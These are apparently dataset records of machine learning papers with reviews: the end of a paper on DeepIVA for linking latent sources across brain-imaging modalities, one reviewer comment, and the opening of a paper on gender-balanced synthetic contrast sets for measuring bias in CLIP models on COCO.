base measure, \( Z_i^m(u) \) is the normalizing constant, \( T_{i,j}^m = (T_{i,1}^m, \ldots, T_{i,k}^m) \) are the sufficient statistics, \( \lambda_{i,j}^m(u) = (\lambda_{i,1}^m(u), \ldots, \lambda_{i,k}^m(u)) \) are the parameters depending on \( u \), and \( k \) is the dimension of each sufficient statistic. Given a dataset \( D = \{(x^{m(n)}, u^{(n)})\}_{n=1}^{N} \) with \( N \) observations sampled from the generative model defined by Equations 5–7,8, the iVAE aims to learn the parameters \( (\theta^m, \phi^m) \) that maximize the data generation likelihood by maximizing the evidence lower bound (ELBO): \[ L_{\text{iVAE}}(\theta^m, \phi^m) = \mathbb{E}_{q_D} \left[ \log p_{\theta^m}(x^m, s^m | u) - \log q_{\phi^m}(s^m | x^m, u) \right], \] where \( q_D \) is the empirical distribution of the dataset \( D \); \( p_{\theta^m}(x^m, s^m | u) \) is the observed conditional joint distribution; \( q_{\phi^m}(s^m | x^m, u) \) is the approximated posterior. The reparameterization trick Figure 1: DeepIVA overview. Step 1: An iVAE is trained to recover sources for each of $M$ data modalities. Step 2: The MISA loss is applied to align sources across $M$ data modalities. Steps 1 and 2 are iterated until convergence. (Kingma & Welling, 2013) is used to sample from a multivariate Gaussian distribution with a diagonal covariance, i.e., $q_{\phi_m}(s^m | x^m, u) = \mathcal{N}(s^m | g^m(x^m, u; \phi_{g^m}), I \sigma^2(x^m, u; \phi_{\sigma}))$. We implement an $L$-layer multilayer perceptron (MLP) as the backbone of the iVAE. The input dimension of the first layer in the encoder is equal to the sum of the feature dimension and the auxiliary information dimension. The input and output dimensions of each intermediate layer are the same, which doubles the feature size ($2V$). The output dimension of the last layer is again equal to the feature dimension. We use Leaky ReLU (Andrew et al., 2013) as the activation function. **Deep Independent Vector Analysis** Consider the following conditional multimodal generative model: $$x^m = f^m(s^m) + \epsilon^m, \quad m = 1, \ldots, M,$$ $$p_\theta(x^1, \ldots, x^M, s^1, \ldots, s^M | u) = \left( \prod_{m=1}^{M} p_{f^m}(x^m | s^m) \right) p_{\theta_s}(s | u),$$ where we define $$p_{f^m}(x^m | s^m) = p_{\epsilon^m}(x^m - f^m(s^m)),$$ $$p_{\theta_s}(s | u) = p_{\theta_s}(s^1, \ldots, s^M | u) = \prod_{i=1}^{C} p_{\theta_{s,i}}(s^i_1, \ldots, s^i_M | u).$$ Integrating $p_{\theta_s}(s | u)$ over $s^m_i$, $\forall i$, $\forall m'$, $m' \neq m$, implies the following (marginal) conditionally independent unimodal latent model: $$p_{\theta_s}(s^1_1, \ldots, s^C_1 | u) = \prod_{i=1}^{C} p_{\theta_{s,i}}(s^i_1 | u).$$ Built upon MISA and iVAE, we propose Deep Independent Vector Analysis (DeepIVA) to learn linked and identifiable latent sources from multiple data modalities defined according to Equations 10–14 (Figure 1). Assuming the unimodal marginals $s^m_i | u$ follow a univariate exponential family distribution, we show that the learned model parameters and sources from DeepIVA are identifiable up to a permutation and component-wise transformation (Appendix A). In DeepIVA, an iVAE is first initiated for each data modality and then a single MISA module is initiated across all data modalities. The iVAE aims to recover sources for each modality and the MISA module aims to identify linkage of sources across modalities. At each epoch, we alternate between training the cross-modal MISA and the unimodal iVAEs. Specifically, we process one segment (segments are defined by the auxiliary variables) from all $M$ modalities at a time, and simultaneously update the encoder parameters for all modalities according to the MISA loss (Equation 4). We then 1 Code will be made publicly available upon acceptance. update the iVAE model parameters (both encoder and decoder) using all segments simultaneously, for each of the $M$ modalities separately, following the iVAE loss (Equation 9). The MISA loss term $J_{D_m}$ in DeepIVA is different from the original MISA framework. Specifically, we compute the Jacobian matrix $\mathbf{J}^m$ of the nonlinear transformation parameterized by the MLP encoder $g^m$ for the $m$-th data modality. For computational efficiency, we approximate the determinant of each Jacobian by the determinant of the average Jacobian across samples, $\bar{\mathbf{J}}^m = \frac{1}{N} \sum_{n=1}^{N} \partial g^m(x^n)$. The loss term is defined as $J_{D_m} = \ln |\det \bar{\mathbf{J}}^m|$ if $\bar{\mathbf{J}}^m$ is a square matrix; $J_{D_m} = \sum_{i=1}^{C} \ln |\sigma_i^m|$ where $\{\sigma_i^m\}_{i=1}^{C}$ is the set of non-zero eigenvalues of $\bar{\mathbf{J}}^m \bar{\mathbf{J}}^m^\top$ if $\bar{\mathbf{J}}^m$ is not a square matrix. Additionally, since MISA is not designed to handle auxiliary information, we modify the original encoder architecture to distinguish between data features $x^m$ and auxiliary variables $u$ such that 1) the iVAE updates model parameters with respect to both $x^m$ and $u$ at the input layer, and 2) the MISA updates only those pertaining to $x^m$ but not $u$. The original iVAE model uses a single input layer taking the concatenated $x^m$ and $u$. In DeepIVA, we split this layer into two: one for data features $x^m$ and another for auxiliary variables $u$. The parameters with respect to $u$ will only be updated at the iVAE training step but will remain frozen at the MISA training step. Also, the inputs for the auxiliary variables are set to 0 during MISA training to ensure no influence from the frozen weights. ### 2.2 Synthetic Data Experiment **Synthetic Data** We generate multimodal synthetic datasets including non-stationary multivariate Gaussian sources. Specifically, we simulate a dataset $\mathbf{X} \in \mathbb{R}^{N \times C \times M}$ where $N = O \times S$ is the number of total observations, $O$ is the number of observations per segment, $S$ is the number of segments, $C$ is the number of sources, and $M$ is the number of modalities. Here, we set $M = 2$, $C \in \{5, 10, 15\}$, $S \in \{14, 8, 4\}$, $N \in \{2800, 5600\}$ to simulate real data, leading to 18 configurations in total. These configurations are chosen according to source identification performance in IVA tasks (Li et al., 2023b). For each segment, we generate a covariance matrix $\Sigma \in \mathbb{R}^{2C \times 2C}$ of both modalities, where the within-modality covariance matrices $\Sigma_{m,m} \in \mathbb{R}^{C \times C}$ along the main (block) diagonal are diagonal matrices with values sampled from a uniform distribution $[0.2, 4]$. Then, the between-modality covariance $\Sigma_{m,m'} \in \mathbb{R}^{C \times C}$ ($m \neq m'$) along the off-diagonal block is defined as a diagonal matrix with correlation values sampled from a uniform distribution $[0.7, 0.9]$ and scaled by the source standard deviations according to $\Sigma_{m,m}$. The data is then generated from a multivariate Gaussian distribution $\mathcal{N}(\mu, \Sigma)$, where $\mu \in \mathbb{R}^{2C}$ is sampled from a uniform distribution $[-3, 3]$. The auxiliary variable $u$ is the segment label with a uniform distribution on the integer set $[1, S]$. Latent variables within each modality are conditionally independent given segment labels $u$. Synthetic sources are visualized in Appendix B.1. A neural network with $L = 2$ layers was employed to act as the nonlinear mixing function $h$. For each layer, a Leaky ReLU (Maas et al., 2013) with a negative slope of 0.2 is used as the activation function. After the last Leaky ReLU layer, we multiply the mixed data from each modality by a different random orthogonal matrix $A$ to obtain the final mixed dataset $\mathbf{X}$. **Synthetic Data Experiment** For each configuration, we run iVAE, MISA and DeepIVA on the same synthetic data for 10 different random seeds, respectively. As for hyperparameters, we set an initial learning rate of 0.001 for the iVAE model. The corresponding MISA learning rate is equal to the iVAE learning rate divided by the number of segments, considering that the MISA model is trained on data from each segment separately. A learning rate scheduler is used to reduce the learning rate by a factor of 0.1 if there is no improvement for 20 epochs. We set the number of maximum contiguous iterations as 10 for both models. For synthetic datasets with 4, 8, and 14 segments, we use a batch size of 140, 160 and 160 for the iVAE model, and a batch size of 200, 350 and 700 for the MISA model, respectively. The model parameters are updated by the Adam optimizer (Kingma & Ba, 2014). Each model is trained for 300 epochs until convergence. ### 2.3 Neuroimaging Data Experiment **Neuroimaging Data** We utilize the UK Biobank dataset (Miller et al., 2016) $\mathbf{X} \in \mathbb{R}^{N \times V \times M}$ including two imaging modalities T1-weighted sMRI and resting-state fMRI ($M = 2$) from 2907 subjects ($N = 2907$). We preprocess sMRI and fMRI to obtain the gray matter tissue probability segmentation (GM) and amplitude of low frequency fluctuations (ALFF) feature maps, respectively. Each GM or ALFF feature map includes 44318 voxels ($V = 44318$). Here, we use age and sex groups Figure 2: Aggregated RDC matrices across segments from a synthetic dataset (2800 samples, 5 sources, 14 segments). IVAE can correctly identify sources from each modality while MISA can better capture linked sources across both modalities. DeepIVA, which unifies iVAE and MISA, can not only recover unimodal sources, but also capture cross-modal linkage. as auxiliary information, assuming that sources within each modality are conditionally independent given the age and sex group. This assumption is based on studies showing the significant impact of age and sex on both brain structure and function (Raz et al., 2004; Good et al., 2001; Ruigrok et al., 2014). We divide neuroimaging data into 14 segments according to sex and age groups such that segments approximately follow a uniform distribution (2 sex groups: male and female; 7 age groups: 46 – 53, 53 – 57, 57 – 61, 61 – 64, 64 – 67, 67 – 70, 70 – 79 years old). Neuroimaging Data Experiment We first run singular value decomposition on each data modality and choose the number of latent sources $C$ based on variance explained. We next apply multimodal group principal component analysis (MGPCA) on two data modalities (sMRI and fMRI) to reduce the feature dimension from 44318 voxels to $C$ common sources. After that, the transformation is applied separately to each dataset in order to obtain modality-specific reductions. We next run iVAE, MISA and DeepIVA on the reduced data $\mathbf{X}_r \in \mathbb{R}^{N \times C \times M}$, respectively. During the training process, we use a full batch size of 2907 samples for both iVAE and MISA, an iVAE learning rate of 0.001, a MISA learning rate of $7.14 \times 10^{-5}$, 300 epochs and 10 iterations per epoch. 2.4 Evaluation Metrics We utilize two metrics, the trimmed mean correlation coefficient between the 25th percentile and the 75th percentile (MCC) and the minimum distance (MD), to evaluate model performance. Unlike MCC, which only measures similarity along the main diagonal after permutation, MD also accounts for off-diagonal (dis)similarity. For each metric, we derive four types of coefficients: 1) a coefficient per modality, per segment; 2) an aggregated coefficient per modality; 3) an aggregated coefficient per segment; 4) a final aggregated coefficient across all modalities and segments. We first compute the randomized dependence coefficient (RDC) matrix $\mathbf{R}$ (Lopez-Paz et al., 2013) between the recovered sources and the ground-truth sources for each modality and each segment. Note that we compute a RDC matrix for each segment separately, instead of computing it across all segments by convention. Our segment-specific RDC can more precisely characterize the data within each segment and effectively mitigate the noise introduced when all segments are taken... simultaneously. Next, we aggregate the RDC matrices over segments by taking the mean to obtain an RDC matrix \( \mathbf{R}^m \) per modality (mean aggregation). We also obtain an aggregated RDC matrix \( \mathbf{R}^u \) per segment by taking the minimum across modalities for the entries corresponding to the sorted indices (i.e., the entries along the main diagonal after sorting) from a linear sum assignment problem (LSAP) solver (Crouse, 2016), and then taking the maximum for the remaining entries across all modalities (min-max aggregation). This min-max aggregation penalizes approaches that fail to detect cross-modal linkage, even when unimodal identifiability is high. To compute the final aggregated RDC matrix, we use min-max aggregation of \( \mathbf{R}^m \) across modalities. We use the permuted indices from the modality-specific RDC matrix \( \mathbf{R}^m \) which yields the lowest MD value as the global sorting indices to sort the other RDC matrices. For each sorted RDC matrix \( \mathbf{R}_s \), we compute the MCC, as well as the MD, slightly adjusted from Equation 4 in Nordhausen et al. (2011): \[ MD(\mathbf{R}) = \frac{1}{2}(1 + \frac{1}{d}\text{trace}(\mathbf{RR}^\top) - \frac{2}{d}\text{trace}(\mathbf{R}_s)), \] where \( \mathbf{R} \) is the unsorted matrix, \( \mathbf{R}_s \) is the sorted matrix, and \( d \) is the dimension of \( \mathbf{R} \). 3 RESULTS 3.1 DeepIVA Learns Linked and Identifiable Sources from Synthetic Datasets The aggregated RDC matrices for a synthetic dataset with 2800 samples, 5 sources and 14 segments from iVAE, MISA, and DeepIVA are shown in Figure 2. The aggregated RDC matrices for datasets with 4 and 8 segments are shown in the Appendix B.2, Figures 10 and 11. Columns I and II show the RDC matrices between the ground-truth sources and the recovered sources for the first modality (M1) and the second modality (M2), respectively. If an approach can successfully recover the latent sources that match the ground-truth sources, we anticipate that high RDC values align along the main diagonal after column permutation (same for both modalities). Greater contrast indicates better source identification performance. Column III shows the RDC matrices of the recovered sources between two modalities, while column IV shows the RDC matrices of the ground-truth sources between two modalities. If an approach can successfully identify the cross-modal linkage, high RDC values will be aligned along the main diagonal in column III, as the ground-truth linkage pattern in column IV. According to Figure 2, we observe that iVAE can identify sources with high RDC values within each modality (M1 MCC: 0.80, M2 MCC: 0.99; row I, columns I and II) but fail to capture cross-modal linkage (MCC: 0.62; row I, column III). By contrast, MISA reveals stronger cross-modal dependence along the main diagonal, suggesting its ability to detect cross-modal linkage (MCC: 0.65; row II, column III). However, MISA cannot fully recover unique unimodal sources (M1 MCC: 0.70, M2 MCC: 0.67; row II, columns I and II). In the first modality (M1), we note that the recovered SCV 1 shows high dependence with both ground-truth SCVs 2 and 3. DeepIVA, which unifies iVAE and MISA, can not only recover unimodal sources (M1 MCC: 0.91, M2 MCC: 0.92; row III, columns I and II) but also show the strongest cross-modal linkage (MCC: 0.72; row III, column III). The corresponding MD and MCC measures are presented in Figure 3. The iVAE shows the best performance for the per-modality per-segment metrics (low MDs, high MCCs). As these metrics only account for identifiability within each modality and each segment (no aggregation), these results again indicate that iVAE can effectively recover segment-specific unimodal sources. We also note that DeepIVA achieves comparable performance to iVAE, suggesting that DeepIVA can also effectively identify sources. The other measures (coefficients per modality, coefficients per segment, and aggregated coefficients) take not only unimodal identifiability but also cross-segment consistency and cross-modal linkage into account. From these metrics, we observe that DeepIVA exhibits superior performance (lowest MDs, highest MCCs) over the other two approaches in all simulation configurations. The aggregated MDs from DeepIVA are consistently lower than those from iVAE and MISA across different segments. Specifically, for 4, 8, and 14 segments, the aggregated MDs from DeepIVA are 68.62%, 49.59%, and 51.26% lower than those from iVAE, respectively. Similarly, the aggregated MDs from DeepIVA are 46.49%, 51.37%, and 44.41% lower than those from MISA for the corresponding segments. Furthermore, the aggregated MCCs from DeepIVA are consistently higher than those from iVAE and MISA. Notably, the aggregated MCCs from DeepIVA are 332.95%, 31.71%, and 88.25% higher than those from iVAE for 4, 8, and 14 segments, respectively. Likewise, the aggregated MCCs from DeepIVA are 22.93%, 34.29%, and 42.36% higher than those from MISA for the respective segments. Additionally, when comparing performance across datasets with 4, 8 and 14 segments, the configuration of 4 segments and 700 samples per segment shows the best source identification performance for the per-modality per-segment metrics. It suggests that variability in the dataset grows with the number of segments, making the optimization problem harder to solve. We perform a systematic evaluation of model performance across different data-generating configurations by varying both the problem scale (5, 10 and 15 sources) and the sample size (2800 and 5600 samples). The aggregated MD and MCC metrics are shown in Figure 4. Remarkably, DeepIVA outperforms iVAE and MISA in every configuration, showcasing its superior performance across all evaluated scenarios. Within each panel, we observe a consistent drop in model performance as the number of latent sources increases, suggesting that the optimization problem becomes more challenging as the latent dimension increases. Across horizontal panels, the DeepIVA performance improves for configurations with 10 and 15 sources when the sample size increases from 2800 to 5600, indicating that a larger sample size is necessary to better recover sources in a harder problem. 3.2 DeepIVA recovers linked neuroimaging sources associated with sex and age We run iVAE, MISA and DeepIVA on a multimodal neuroimaging dataset to evaluate their effectiveness in real data. Results from singular value decomposition of sMRI GM and fMRI ALFF feature maps suggest that top 15 sources can capture a large portion of variance explained in the data (Appendix C.1, Figure 12), and thus we choose to identify 15 common independent sources. The aggregated RDC matrices across segments between two neuroimaging modalities are presented in Figure 5: Aggregated RDC matrices across 14 segments of 15 recovered sources between two imaging modalities. DeepIVA captures cross-modal linkage from multimodal neuroimaging data. Figure 6: DeepIVA linked imaging SCVs associated with sex and age. Row I shows sex effect (blue: male; red: female). Row II shows aging effect (cold color: younger group; warm color: older group). Row III shows fitted linear lines from each segment (blue: male; red: female; light: younger group; dark: older group). Figure 5. Similar to simulations, DeepIVA shows the strongest cross-modal dependence along the main diagonal (MCC: 0.46), suggesting that it can better capture linked sources across two imaging modalities. We then color code the recovered sources from DeepIVA by sex and age groups (Figure 6), and observe noticeable sex clusters (e.g. SCVs 12 and 15) and age clusters (e.g. SCVs 8 and 11), indicating that DeepIVA captures linked sources related to phenotype measures. Furthermore, we fit a separate linear line for observations from each segment. If DeepIVA is capable of identifying consistent linked sources across segments, we should be able to observe that these fitted lines share similar slopes. Indeed, we note that slopes of fitted lines per segment are very consistent for most sources (e.g. SCVs 1 – 9). Color-coded sources from iVAE are less aligned across segments while those from MISA are not associated with sex and age (Appendix C.2 Figures 13 and 14). 4 DISCUSSION Summary We propose a deep multivariate latent variable model, Deep Independent Vector Analysis (DeepIVA), to learn linked and identifiable latent sources that are nonlinearly mixed across multiple data modalities. DeepIVA unifies iVAE and MISA, and exhibits unique advantages from each approach, specifically unimodal source identification from iVAE as well as cross-modal linkage detection from MISA. We demonstrate that DeepIVA can recover linked and identifiable sources from multiple synthetic datasets. Moreover, we show that DeepIVA reveals biologically meaningful linked sources from a large multimodal neuroimaging dataset. Limitations DeepIVA assumes that sources are conditionally independent given the auxiliary variable to achieve identifiability, as it utilizes the iVAE objective. However, there may not be sufficient information about such an auxiliary variable in real data. Though we obtain sources related to age and sex groups, the true data-generating process remains unknown in the neuroimaging data. Future Work We plan to extend our proposed method from nonlinear IVA problems to nonlinear ISA problems, aiming to capture source dependence by leveraging higher-dimensional subspaces. It is also worth exploring approaches that do not require side information, such as applying structural sparsity (Zheng et al., 2022), learning latent clusters (Willets & Paige, 2021; Jiang et al., 2016) or using a Gaussian mixture prior and a deep ReLU/Leaky-ReLU network (Kivva et al., 2022). REFERENCES Anees Abrol, Zening Fu, Mustafa Salman, Rogers Silva, Yuhui Du, Sergey Plis, and Vince Calhoun. Deep learning encodes robust discriminative neuroimaging representations to outperform standard machine learning. *Nature communications*, 12(1):1–17, 2021. Tülay Adali, Matthew Anderson, and Geng-Shen Fu. Diversity in independent component and vector analyses: Identifiability, algorithms, and applications in medical imaging. *IEEE Signal Processing Magazine*, 31(3):18–33, 2014. Galen Andrew, Raman Arora, Jeff Bilmes, and Karen Livescu. Deep canonical correlation analysis. In *International conference on machine learning*, pp. 1247–1255. PMLR, 2013. Vince D Calhoun and Jing Sui. Multimodal fusion of brain imaging data: a key to finding the missing link (s) in complex mental illness. *Biological psychiatry: cognitive neuroscience and neuroimaging*, 1(3):230–244, 2016. J-F Cardoso. Multidimensional independent component analysis. In *Proceedings of the 1998 IEEE International Conference on Acoustics, Speech and Signal Processing, ICASSP’98 (Cat. No. 98CH36181)*, volume 4, pp. 1941–1944. IEEE, 1998. Pierre Comon. Independent component analysis, a new concept? *Signal processing*, 36(3):287–314, 1994. David F Crouse. On implementing 2d rectangular assignment algorithms. *IEEE Transactions on Aerospace and Electronic Systems*, 52(4):1679–1696, 2016. Catriona D Good, Ingrid S Johnsrude, John Ashburner, Richard NA Henson, Karl J Friston, and Richard SJ Frackowiak. A voxel-based morphometric study of ageing in 465 normal adult human brains. *Neuroimage*, 14(1):21–36, 2001. Luigi Gresele, Paul K Rubenstein, Arash Mehrjou, Francesco Locatello, and Bernhard Schölkopf. The incomplete rosetta stone problem: Identifiability results for multi-view nonlinear ica. In *Uncertainty in Artificial Intelligence*, pp. 217–227. PMLR, 2020. Aapo Hyvarinen and Hiroshi Morioka. Unsupervised feature extraction by time-contrastive learning and nonlinear ica. *Advances in neural information processing systems*, 29, 2016. Aapo Hyvärinen and Petteri Pajunen. Nonlinear independent component analysis: Existence and uniqueness results. *Neural networks*, 12(3):429–439, 1999. Aapo Hyvarinen, Hiroaki Sasaki, and Richard Turner. Nonlinear ica using auxiliary variables and generalized contrastive learning. In *The 22nd International Conference on Artificial Intelligence and Statistics*, pp. 859–868. PMLR, 2019. Zhuxi Jiang, Yin Zheng, Huachun Tan, Bangsheng Tang, and Hanning Zhou. Variational deep embedding: An unsupervised and generative approach to clustering. *arXiv preprint arXiv:1611.05148*, 2016. Ilyes Khemakhem, Diederik Kingma, Ricardo Monti, and Aapo Hyvarinen. Variational autoencoders and nonlinear ica: A unifying framework. In *International Conference on Artificial Intelligence and Statistics*, pp. 2207–2217. PMLR, 2020. Taesu Kim, Torbjørn Eltoft, and Te-Won Lee. Independent vector analysis: An extension of ica to multivariate components. In *International conference on independent component analysis and signal separation*, pp. 165–172. Springer, 2006. Diederik P Kingma and Jimmy Ba. Adam: A method for stochastic optimization. *arXiv preprint arXiv:1412.6980*, 2014. Diederik P Kingma and Max Welling. Auto-encoding variational bayes. *arXiv preprint arXiv:1312.6114*, 2013. Bohdan Kivva, Goutham Rajendran, Pradeep Ravikumar, and Bryon Aragam. Identifiability of deep generative models without auxiliary information, 2022.
FwdnG0xR02
In this work, author only adopted COCO Captions dataset for tasking and gender as the debias attribute. It would be more convincing if author provide discussion and empirical result of how does insight draw from this work also applicable to other dataset and attribute.
Balancing the Picture: Debiasing Vision-Language Datasets with Synthetic Contrast Sets Anonymous authors Paper under double-blind review Abstract Vision-language models are growing in popularity and public visibility to generate, edit, and caption images at scale; but their outputs can perpetuate and amplify societal biases learned during pre-training on uncurated image-text pairs from the internet. Although debiasing methods have been proposed, we argue that these measurements of model bias lack validity due to dataset bias. We demonstrate there are spurious correlations in COCO Captions, the most commonly used dataset for evaluating bias, between background context and the gender of people in-situ. This is problematic because commonly-used bias metrics (such as Bias@K) rely on per-gender base rates. To address this issue, we propose a novel dataset debiasing pipeline to augment the COCO dataset with synthetic, gender-balanced contrast sets, where only the gender of the subject is edited and the background is fixed. As existing image editing methods have limitations and sometimes produce low-quality images; we introduce a method to automatically filter the generated images based on their similarity to real images. Using our balanced synthetic contrast sets, we benchmark bias in multiple CLIP-based models, demonstrating how metrics are skewed by imbalance in the original COCO images. Our results indicate that the proposed approach improves the validity of the evaluation, ultimately contributing to more realistic understanding of bias in CLIP. 1 Introduction Vision-Language Models (VLMs) are rapidly advancing in capability and have witnessed a dramatic growth in public visibility: DALL-E [Ramesh et al., 2021] has more than 1.5 million users creating over 2 million images a day; the discord channel for MidJourney [MidJourney, 2023] hosts over two million members [Salkowitz, 2022]; and shortly after its release, Stability.AI reported that their Stable Diffusion model [Rombach et al., 2022] had over 10 million daily active users [Fatunde & Tse, 2022]. Underpinning these powerful generative models are image-text encoders like CLIP [Radford et al., 2021], which are themselves used for many discriminative tasks, such as video action recognition, open set detection and segmentation, and captioning. These encoders are pre-trained on large-scale internet scraped datasets. The uncurated nature of such datasets can translate to generated images that risk inflicting a range of downstream harms on their end users and society at large – from bias and negative stereotypes, to nudity and sexual content, or violent or graphic imagery [Birhane et al., 2021; Cherti et al., 2022]. In light of these issues, coupled with growing use of generative AI, it is vital to reliably benchmark the bias in VLMs, particularly in the image-text encoders. A small emerging body of work attempts to measure bias in VLMs [Agarwal et al., 2021; Berg et al., 2022; Chuang et al., 2023], or to debias their feature representations [Berg et al., 2022; Chuang et al., 2023]. Yet the legitimacy of this work critically depends on both a suitable evaluation metric and an evaluation dataset to accurately depict the bias in pre-trained model weights and reliably signal whether debiasing attempts have been successful. The predominant focus on model-centric debiasing methods has overshadowed two main challenges associated with datasets and metrics: (i) the common use of cropped face datasets, such as FairFace [Kärkkäinen & Joo, 2021], fall short because excluding contextual background presents an inaccurate and unreliable assessment of bias in natural images; and (ii) even if natural, open-domain images containing contextual clues are used, they are unbalanced by identity attribute representation. within contexts. This is problematic because commonly-used bias metrics, such as Bias@K, are affected by the naturally-occurring distribution of images. Thus, while using contextual images is desirable, it comes at the cost of spurious correlations, affecting the reliability of bias metrics. In this paper, we argue that these confounding factors arising from the interaction of metric choice and biased datasets paint an unreliable picture when measuring model bias in VLMs. To counter these issues, we propose a synthetic pipeline for debiasing a dataset into contrast sets balanced by identity attributes across background contexts. Our pipeline draws on the success of contrast sets in NLPs [Gardner et al., 2020] and leverages recent advances in controllable image editing and generation [Brooks et al., 2022]. We illustrate our approach with a focus on gender bias and define a contrast set as containing pairs of images from COCO [Chen et al., 2015] where each image ID has two synthetically-edited versions (one man, one woman) where the background is fixed and only the person bounding box is edited. We make three key contributions: (1) We demonstrate spurious correlations in the COCO dataset between gender and context, and show their problematic effects when used to measure model bias (Sec. 3); (2) We present the GENSYNTH dataset, built from a generative pipeline for synthetic image editing, and a filtering pipeline using KNN with real and synthetic images to control for the quality of the generated images (Sec. 4); (3) We benchmark CLIP models [Radford et al., 2021; Wang et al., 2021a] on our GENSYNTH dataset, which has no spurious correlation, and cast doubts on the effectiveness of debiasing methods (Sec. 5). Our findings demonstrate that debiasing a dataset with synthetic contrast sets can avoid spurious correlations and more reliably measure model bias. While synthetically-edited data has promise in (i) preserving privacy of subjects included in vision datasets, and (ii) adding controllability to the dataset features, it also risks introducing a real-synthetic distribution shift and stacking biases of various generative models may essentialise representations of gender (see Sec. 6). Despite these early-stage limitations, this work starts a conversation about the importance of the interaction between dataset features with bias metrics, ultimately contributing to future work that paints a more accurate and balanced picture of identity-based bias in VLMs. 2 RELATED WORKS Defining Fairness and Bias. Fairness is a complex, context-dependent concept [Mehrabi et al., 2021; Verma & Rubin, 2018]. Here, we adopt a narrow definition where no group is advantaged or disadvantaged based on the protected attribute of gender in retrieval settings [Friedrich et al., 2023; Hendricks et al., 2018]. The metrics employed in this paper, Bias@K [Wang et al., 2021a] and Skew@K [Geyik et al., 2019], are used to assess disparity in distribution between search results and desired outcomes. In this work, we assume activities such as dancing, skateboarding, laughing would not have a strong gendered prior and thus the desired distribution is one where all protected attributes have equal chance of being returned in a query that does not explicitly mention gender.\footnote{In certain specific contexts, for example, pregnant or breastfeeding women, we may not necessarily want an equal distribution of masculine and feminine images to be returned, though we must be careful to not conflate biological gender and gender identity (see Sec. 6).} Measuring Model Bias. Measuring bias in VLMs is a growing area of research [Luccioni et al., 2023]. Early work measures the misclassification rates of faces into harmful categories [Agarwal et al., 2021]. Several works measure outcome bias for text-to-face retrieval [Berg et al., 2022; Chuang et al., 2023; Seth et al., 2023], though it is unclear how such measurements made on cropped face datasets generalise to real-world settings. For gender fairness in open-domain images, COCO Captions [Chen et al., 2015] is a standard benchmark for cross-modal retrieval [Wang et al., 2021a, 2022] and image captioning [Hendricks et al., 2018; Zhao et al., 2021]. Dataset Bias. Datasets, including those used for bias evaluation, have their own biases from curation and annotation artefacts. Image datasets have been found to include imbalanced demographic representation [Buolamwini & Gebru, 2018; De Vries et al., 2019; Torralba & Efros, 2011; Wang & Russakovsky, 2023; Wang et al., 2019; Zhao et al., 2021], stereotypical portrayals [Caliskan et al., 2017; Schwemmer et al., 2020; van Miltenburg, 2016], or graphic, sexually-explicit and other harmful content [Birhane et al., 2021]. Similar to [Meister et al., 2022; Wang & Russakovsky, 2023], we identify spurious gender correlations in the COCO Captions dataset and show this renders the datasets unsuitable for current bias retrieval metrics. Techniques to reduce dataset biases range... from automatic [Schuhmann et al., 2022] to manual filtering [Yang et al., 2020] of harmful images, such as those containing nudity [Schuhmann et al., 2022], toxicity, or personal and identifiable information [Asano et al., 2021]. Yet, these filters cannot identify subtle stereotypes and spurious correlations present in open-domain images – making it difficult to curate a wholly unbiased natural image dataset [Meister et al., 2022]. **Mitigating Dataset Bias with Synthetic Data.** Deep networks need large amounts of labeled data, prompting the creation of synthetic datasets for various computer vision tasks [Dosovitskiy et al., 2015; Johnson et al., 2017; Michieli et al., 2020; Song et al., 2017]. More recently, progress in generative models [Ramesh et al., 2021; Rombach et al., 2022; Saharia et al., 2022] has enabled methods to synthetically generate training data [Brooks et al., 2022; Li et al., 2022; Peebles et al., 2022; Zhai & Wu, 2018]. Similarly, text-guided editing methods [Brooks et al., 2022; Hertz et al., 2022; Tumanyan et al., 2022] offer scalable and controllable image editing, potentially enhancing dataset fairness and removing issues related to existing spurious correlations. Several works propose the use of synthetic datasets for mitigating dataset bias, such as with GANs [Sattigeri et al., 2019] or diffusion models [Friedrich et al., 2023]. However, synthetic or generated data may not necessarily represent underlying distributions of marginalised groups within populations and thus still unfairly disadvantage certain groups [Altman, 2021; Belgodere et al., 2023; Bhanot et al., 2021; Lu et al., 2023]. To combat these risks, fairness in generative models is an area gaining popularity: StyleGAN [Karras et al., 2019] has been used to edit images on a spectrum, rather than using binary categories; Hermes [2022]; Friedrich et al. [2023] use human feedback to guide diffusion models to generate diverse human images; and Kim et al. [2022] learn to transfer age, race and gender across images. Similar to our work, GAN-based frameworks [Denton et al., 2019; Ramaswamy et al., 2021] edit an existing face dataset to equalise attributes and enforce fairness. Our work extends this approach to open-domain images, introducing an automatic filtering technique for improving the quality of edits. To our knowledge, we are the first to propose image editing of open-domain images for fairness. Our work is also inspired by the use of contrast sets in NLP [Gardner et al., 2020], which have been used to alter data by perturbing demographics (race, age, gender) in order to improve fairness [Qian et al., 2022]. We use synthetically-generated contrast sets by augmenting both the textual and visual input to CLIP, for a more accurate evaluation of VLM bias. ### 3 Measuring Gender Bias on Natural Images While prior works make in-depth comparisons between models, and even metrics [Berg et al., 2022], there is a dearth of research investigating whether natural image datasets, with their own biased and spurious correlations, are suitable benchmarks to measure bias in VLMs. In this section, we investigate the extent of dataset bias from spurious correlations in COCO (Sec. 3.3) and its effect on reliably measuring model bias (Sec. 3.4). #### 3.1 Preliminaries We first define the bias metrics and the framework used to measure model bias on image-caption data. **Bias@K** [Wang et al., 2021a] measures the proportions of masculine and feminine images in the retrievals of a search result with a gender-neutral text query. For an image $I$, we define a function $g(I) = \text{male}$ if there are only individuals who appear as men in the image, and $g(I) = \text{female}$ if there are only individuals who appear as women. Given a set of $K$ retrieved images $\mathcal{R}_K(q)$ for a query $q$, we count the images of apparent men and women as: $$N_{\text{male}} = \sum_{I \in \mathcal{R}_K(q)} \mathbb{1}[g(I) = \text{male}] \quad \text{and} \quad N_{\text{female}} = \sum_{I \in \mathcal{R}_K(q)} \mathbb{1}[g(I) = \text{female}].$$ We define the gender bias metric as: $$\delta_K(q) = \begin{cases} 0, & N_{\text{male}} + N_{\text{female}} = 0 \\ \frac{N_{\text{male}} - N_{\text{female}}}{N_{\text{male}} + N_{\text{female}}}, & \text{otherwise}. \end{cases}$$ For a whole query set $Q$, we define: $$\text{Bias}@K = \frac{1}{|Q|} \sum_{q \in Q} \delta_K(q).$$ (1) Skew@K \cite{berg2022bias, geyik2019gender} measures the difference between the desired proportion of image attributes in \( R_K(q) \) for the query \( q \) and the actual proportion. Let the desired proportion of images with attribute label \( A \) in the set of retrieved images be \( p_{d,q,A} \in [0, 1] \) and the actual proportion be \( p_{R(q),q,A} \in [0, 1] \). The Skew@K of \( R(q) \) for an attribute label \( A \in \mathcal{A} \) is: \[ \text{Skew@K}(R(q)) = \ln 